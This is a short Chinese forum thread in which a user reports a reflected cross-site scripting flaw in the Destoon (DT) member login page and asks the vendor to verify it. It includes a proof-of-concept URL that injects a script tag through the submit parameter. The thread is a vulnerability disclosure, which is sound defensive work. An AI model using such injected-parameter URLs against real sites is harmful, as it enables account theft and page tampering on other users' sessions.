destoon采集论坛

 找回密码
 立即注册
查看: 131|回复: 1

DT存在跨站脚本攻击漏洞

[复制链接]

12

主题

25

回帖

106

积分

注册会员

Rank: 2

积分
106
发表于 2012-12-7 10:16:02 | 显示全部楼层 |阅读模式
本帖最后由 jfee 于 2012-12-7 10:17 编辑

1.恶意用户可以使用该漏洞来盗取用户账户信息、模拟其他用户身份登录,更甚至可以修改网页呈现给其他用户的内容。

你的域名地址/member/login.php?username=%E4%BC%9A%E5%91%98%E5%90%8D/Email&password=password&submit=1%3Cscript%3Ealert(42873)%3C/script%3E



你的域名地址/member/login.php?submit=1&username=会员名/Email&password=password

以上漏洞请官方核查
回复

使用道具 举报

0

主题

1

回帖

4

积分

新手上路

Rank: 1

积分
4
发表于 2013-1-25 09:01:54 | 显示全部楼层

同问。。。。。。。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|小黑屋|手机版|Archiver|destoon采集论坛

GMT+8, 2025-11-23 10:26 , Processed in 0.016963 second(s), 21 queries .

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表